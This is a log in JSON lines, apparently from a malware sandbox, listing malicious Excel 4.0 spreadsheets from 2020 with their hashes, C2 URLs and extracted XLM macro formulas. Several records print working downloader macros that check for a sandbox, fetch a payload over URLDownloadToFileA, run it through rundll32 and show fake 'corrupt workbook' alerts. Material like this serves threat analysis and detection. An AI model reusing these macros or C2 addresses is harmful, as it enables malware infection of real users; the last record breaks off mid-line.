{"version":"0.2","sample":{"sample":"","kind":"file","target":"a27a2301e8e6f7ec9239434303cc6ad531c366981930c18123fccb175f30bec5"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a27a2301e8e6f7ec9239434303cc6ad531c366981930c18123fccb175f30bec5","filesize":112128,"md5":"7b088870f78848a6d789596ae67454cd","sha1":"81e17c0cc513fe38c52c4212ef5a3c8e43614b04","sha256":"a27a2301e8e6f7ec9239434303cc6ad531c366981930c18123fccb175f30bec5","sha512":"0a34185115b479905dbcb84dc4486d5384c6f6c413bf038e37080695f64ff3d4b44469241d88a3d8b1676df22c84e297a033b8bb41b0742842d649c5660e55a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a27a2301e8e6f7ec9239434303cc6ad531c366981930c18123fccb175f30bec5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a27c1ee4a7346822f9cf6bc7317731ceb9095c38c3e003d7c25b04ef97119d1b"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a27c1ee4a7346822f9cf6bc7317731ceb9095c38c3e003d7c25b04ef97119d1b","filesize":185344,"md5":"604dc3e3e7230121dfbffe10e525de56","sha1":"a25eea24c01096665fd14b071457ab67bdc62f4f","sha256":"a27c1ee4a7346822f9cf6bc7317731ceb9095c38c3e003d7c25b04ef97119d1b","sha512":"41d255fac43103c9c0f9b65770aafa913d49ea16a464aeb0a68fec6c6e63312087dfb8dbc8ebbd87da5274d17836e5c006d9bcd992ece1eb80055e904acb89ce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a27c1ee4a7346822f9cf6bc7317731ceb9095c38c3e003d7c25b04ef97119d1b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a281775e85adf1d048d849cbed706eb8d968c8b799560868f8eb3e8a6a9e2764"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a281775e85adf1d048d849cbed706eb8d968c8b799560868f8eb3e8a6a9e2764","filesize":116224,"md5":"ca0a6c3340b6fa15f71438cc28ae6a64","sha1":"d5ec63153fb9fe24824b884b4c9ad2ea8e408f14","sha256":"a281775e85adf1d048d849cbed706eb8d968c8b799560868f8eb3e8a6a9e2764","sha512":"35e5b2419430a10441c5dbde86764db5cf3e7c5feb7b938e31dfafbb637e78faec2f0fdd676b1a7035376d3e4d74e0b16a6e47bd3f7b4fd5a2b8f1ce300b48c7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a281775e85adf1d048d849cbed706eb8d968c8b799560868f8eb3e8a6a9e2764.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ASu7bZApjv\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a285a3c9b02508ded685cb88f1d30edc544b823e22f1dda07cdacae2fa504ad2"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a285a3c9b02508ded685cb88f1d30edc544b823e22f1dda07cdacae2fa504ad2","filesize":185344,"md5":"e18de6127d40ff1d0cb9236732a5f42f","sha1":"4f848ec7e39c8ec3ddfea8e0c7a9d6c6fbe99a87","sha256":"a285a3c9b02508ded685cb88f1d30edc544b823e22f1dda07cdacae2fa504ad2","sha512":"2a9f68e80f5754f25119bf227069c789f4cbfda456108d3378fbb7efbeb336e1dd3ca9e172a702380a639658b78efa9c5750fbdc89d98173bdf935ae6d21eb20","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a285a3c9b02508ded685cb88f1d30edc544b823e22f1dda07cdacae2fa504ad2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a2a45d63d77b86f87cf60de0f25c74603febf34baa61fe891bff4ea0e0be9817"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a2a45d63d77b86f87cf60de0f25c74603febf34baa61fe891bff4ea0e0be9817","filesize":185344,"md5":"0709897fcd911ee737a9868a3ac9370e","sha1":"1034df14ff7736676f86f15b45bc24d978c72bb8","sha256":"a2a45d63d77b86f87cf60de0f25c74603febf34baa61fe891bff4ea0e0be9817","sha512":"04d97e87f1c18d4a94f667927a6c4f9b1268b6a8359e5b23185ee2989087906e1ead7a3c678bc1f75dcf4599a272c78e3a423c1f287298d9a9e1c059ea222de6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a2a45d63d77b86f87cf60de0f25c74603febf34baa61fe891bff4ea0e0be9817.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a2b5f88a8c68ce70636dcdfca288cb82a96bc4ea076e16369e80c04a8a421e62"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a2b5f88a8c68ce70636dcdfca288cb82a96bc4ea076e16369e80c04a8a421e62","filesize":160768,"md5":"468d9baaf9258395242bacdca8285e75","sha1":"e117ab30e61ad5ae52c9c2db38baa9c5c69eb805","sha256":"a2b5f88a8c68ce70636dcdfca288cb82a96bc4ea076e16369e80c04a8a421e62","sha512":"56184d9e6b93899cebeeca11cec17d5c983eed9854b671b6416374c1a8227eabb2f50d1177f8f2ea5580c93ee3de3fcdf0021c7f34525e8475073e0b811324e8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a2b5f88a8c68ce70636dcdfca288cb82a96bc4ea076e16369e80c04a8a421e62.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8fvclRormE\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a2bc53c65db1b9c110294e7c6852fb83aa2992ce221cec90d5c1081667b7a065"},"analysis":{"reported":"2020-04-09T16:18:04Z","score":10},"files":[{"filename":"a2bc53c65db1b9c110294e7c6852fb83aa2992ce221cec90d5c1081667b7a065","filesize":167936,"md5":"9f2c80e0b53fbe1115f90522706ee962","sha1":"ee05e7e5d877d7d3dfe9ed32e779bbb0a1710bf5","sha256":"a2bc53c65db1b9c110294e7c6852fb83aa2992ce221cec90d5c1081667b7a065","sha512":"5464dcdf4b89c616d6e1b70c1558b0187842a7fe382128d0bc2ecfbbc340f16a226fe0201c42adbf426aca12b9586a3cd1f780abaf2e1e7b5e8cdbb68e031310","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a2bc53c65db1b9c110294e7c6852fb83aa2992ce221cec90d5c1081667b7a065.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"816PlqrkQ0\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a2c7222c00793a52fa9ca3e336f1ab65a0e38c8bad9a4113e5146f39430c8b91"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a2c7222c00793a52fa9ca3e336f1ab65a0e38c8bad9a4113e5146f39430c8b91","filesize":209920,"md5":"76199ea0950bcd65b0a48fdde3605622","sha1":"344d5da3231a0188cce5b815e6d2b8cb5abfb2a8","sha256":"a2c7222c00793a52fa9ca3e336f1ab65a0e38c8bad9a4113e5146f39430c8b91","sha512":"e8ed729c03899887dffe46a2474f39ae5f7ffe404df54a2b146b7f546e05c9ade28cf787074ca93cbf11afcbcd295aff39588d726f72a97cca3cb1d113e9c7da","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a2c7222c00793a52fa9ca3e336f1ab65a0e38c8bad9a4113e5146f39430c8b91.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tmzqdfuLtZ\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a2e2203d6bd127956d00e06fc9ef0d0da4fa3e26f6c1f3faa1df4e5629a7d2b4"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a2e2203d6bd127956d00e06fc9ef0d0da4fa3e26f6c1f3faa1df4e5629a7d2b4","filesize":144384,"md5":"91e5c7d06a159f50b66883c2554fd87e","sha1":"1009d4eef1a4dab2a5229b0829a69da980bb784c","sha256":"a2e2203d6bd127956d00e06fc9ef0d0da4fa3e26f6c1f3faa1df4e5629a7d2b4","sha512":"17b1df8a69c6fc481460abeb50283bed5e15959ca4e02d5d654057ff139933e519d7d75f21fe43f0165ff79163bc111097fdc6e4f2ec38d184cb9d26721489d9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a2e2203d6bd127956d00e06fc9ef0d0da4fa3e26f6c1f3faa1df4e5629a7d2b4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"6XACDzE10F\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a2ea07967ebef4a79809f521c3c13ee069486e4fccd51c32a62841d5c33b51c8"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a2ea07967ebef4a79809f521c3c13ee069486e4fccd51c32a62841d5c33b51c8","filesize":209408,"md5":"0818de27f7135d40bdf9fb8915246bab","sha1":"328f47713d9ee6044b3de653ed0b87294762843b","sha256":"a2ea07967ebef4a79809f521c3c13ee069486e4fccd51c32a62841d5c33b51c8","sha512":"eb4f48ad064755b84f46f81b857ea2c9323564d67a0ea20a4066315f11e8bdd6f73e466f2ad8c76a81b7bea3871d4f7271189afcecb4c76e043600b84ff29984","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a2ea07967ebef4a79809f521c3c13ee069486e4fccd51c32a62841d5c33b51c8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"a2PTpzqQCY\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a2f76306f4891a32eb52139b1f9a76e9bda4a746bd7ffa41f8375d3fffabf6a4"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a2f76306f4891a32eb52139b1f9a76e9bda4a746bd7ffa41f8375d3fffabf6a4","filesize":147968,"md5":"4914fa3242ed53132d4ee63b744baa15","sha1":"f075c419e0ce366d5a859c73bdd6707320d9469e","sha256":"a2f76306f4891a32eb52139b1f9a76e9bda4a746bd7ffa41f8375d3fffabf6a4","sha512":"69473350eba2c96aa427714ea72f0574452dc713daf363f68daedfd1e2529378fc5dab47fcd92b8a9b34bddae939a0d055f4b9b28a2ee27d181a7e86bac3b2ae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a2f76306f4891a32eb52139b1f9a76e9bda4a746bd7ffa41f8375d3fffabf6a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"zS1qA3hs6i\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a323c8e7e46a6727017741fdc1aaf4df55b9ed7b8a42169290cbdb816ecb1b22"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a323c8e7e46a6727017741fdc1aaf4df55b9ed7b8a42169290cbdb816ecb1b22","filesize":185344,"md5":"b6a53e37d9badb2e99531b41e287c36f","sha1":"31169ec59e203b515279cd22d2cc730840559bec","sha256":"a323c8e7e46a6727017741fdc1aaf4df55b9ed7b8a42169290cbdb816ecb1b22","sha512":"d7f6420adefaffc520a0013710e02cebe2d7ba04d227fa433722be05878fd24c5f2e41892a064625c2bf7b4fdba555e89949b524aae3785ceece8aae969e810e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a323c8e7e46a6727017741fdc1aaf4df55b9ed7b8a42169290cbdb816ecb1b22.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a328851dfeacfee57b22432127c11acb0dcd0b927fce7268ed8cbb6024cbb4bd"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a328851dfeacfee57b22432127c11acb0dcd0b927fce7268ed8cbb6024cbb4bd","filesize":185344,"md5":"dff573141cbff24c2fbb6ff639c55847","sha1":"3abf383e79c5c3a5d223e5b358be83224b91236d","sha256":"a328851dfeacfee57b22432127c11acb0dcd0b927fce7268ed8cbb6024cbb4bd","sha512":"53a958021717bd7788584d74edd054a58d9968898a612b0a92e0ce340e6bbee88e40d9ff1d829848577f4dcd037af9152e9378afa53b95798af0edc951632a6e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a328851dfeacfee57b22432127c11acb0dcd0b927fce7268ed8cbb6024cbb4bd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a32d04d2b357ad4c1ea036afe4eb0b6c2e27277b6cf93d948fb3b43d3f26f278"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a32d04d2b357ad4c1ea036afe4eb0b6c2e27277b6cf93d948fb3b43d3f26f278","filesize":116224,"md5":"6401ac35b1b998fe8a3996139520bb02","sha1":"c4095eef19b40d9f36d336c2bb2f7546335dcaba","sha256":"a32d04d2b357ad4c1ea036afe4eb0b6c2e27277b6cf93d948fb3b43d3f26f278","sha512":"34065add8f2d7fb74a5c56617ee5a497c07366e2b76ffa3df17ac8e20fa05d7c0644db74e6af94fe49ee67fe05e3634b17543b85c5b73ec8c8c93371fbc64d2a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a32d04d2b357ad4c1ea036afe4eb0b6c2e27277b6cf93d948fb3b43d3f26f278.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1RZZ9m3HNE\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a32e7279675a4d7f681be342242de59d0de6aa3880d36cbc2b05cc06a87b0a8d"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a32e7279675a4d7f681be342242de59d0de6aa3880d36cbc2b05cc06a87b0a8d","filesize":185344,"md5":"94e9de262e0b843034adcb93c44883b3","sha1":"25338182f9b89bd6ea67a37e88c8aecaa1b182b5","sha256":"a32e7279675a4d7f681be342242de59d0de6aa3880d36cbc2b05cc06a87b0a8d","sha512":"823498d596dbcd1b719ec2a6ee9d6470ddff96a872aa491f4425bbdb8354811929cf8c724978febe55b674886f9fa6144b922add5b5156577c2e764bc25f8830","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a32e7279675a4d7f681be342242de59d0de6aa3880d36cbc2b05cc06a87b0a8d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a333330834a718a211ccbdbd2c60ec87e306ecb63cd2ecd6b472d0d1960a3ae8"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a333330834a718a211ccbdbd2c60ec87e306ecb63cd2ecd6b472d0d1960a3ae8","filesize":185344,"md5":"b5ff650cec4f415fe275856cecbba689","sha1":"1e71c87f0eafd96a607b8d75ab7e300b2bd95d29","sha256":"a333330834a718a211ccbdbd2c60ec87e306ecb63cd2ecd6b472d0d1960a3ae8","sha512":"ef8f884505bbbe0a123c2e5561c56d351a3b0161ee5cc3f491bcacc3b7830156f71cbde8d6f6a5f1e5c1be958e0ebf970d3482a27d29d6b27262ae53fc25ce6a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a333330834a718a211ccbdbd2c60ec87e306ecb63cd2ecd6b472d0d1960a3ae8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a3339504f9afa7b40cb24e39607eb8d184ca2c4b4729799b940c3d72af732259"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a3339504f9afa7b40cb24e39607eb8d184ca2c4b4729799b940c3d72af732259","filesize":185344,"md5":"6e3845e8e44f10c6d6b14f4f454fd5a9","sha1":"49e1e35445d7e6cca51d7365780ea627ac0c6da6","sha256":"a3339504f9afa7b40cb24e39607eb8d184ca2c4b4729799b940c3d72af732259","sha512":"f039c1c97cd7571529b339e37facaf033f6c3f2df8636ebe13f3d5ac00c64d942f337b1e3da6473be44a9d66e42766ce0c599e0ac08b17359fa401690835dbd0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a3339504f9afa7b40cb24e39607eb8d184ca2c4b4729799b940c3d72af732259.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a33a93b15fd2e09c4c13aef7986b383370f2c23302ed6954f25edc252b8a6a2f"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a33a93b15fd2e09c4c13aef7986b383370f2c23302ed6954f25edc252b8a6a2f","filesize":152576,"md5":"e391029ffcc0db41dd6e9e986d080f05","sha1":"a53b024bc31d19c25fc17b84c7105ef40039b2ea","sha256":"a33a93b15fd2e09c4c13aef7986b383370f2c23302ed6954f25edc252b8a6a2f","sha512":"6c3b855331c5fe7232850d586e2cbd895a25eefa00bee6218d478f05273e1a50416fdb711708b644d2473b4a482e1038f45cf6422ed55241046b2acab1026d99","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a33a93b15fd2e09c4c13aef7986b383370f2c23302ed6954f25edc252b8a6a2f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, 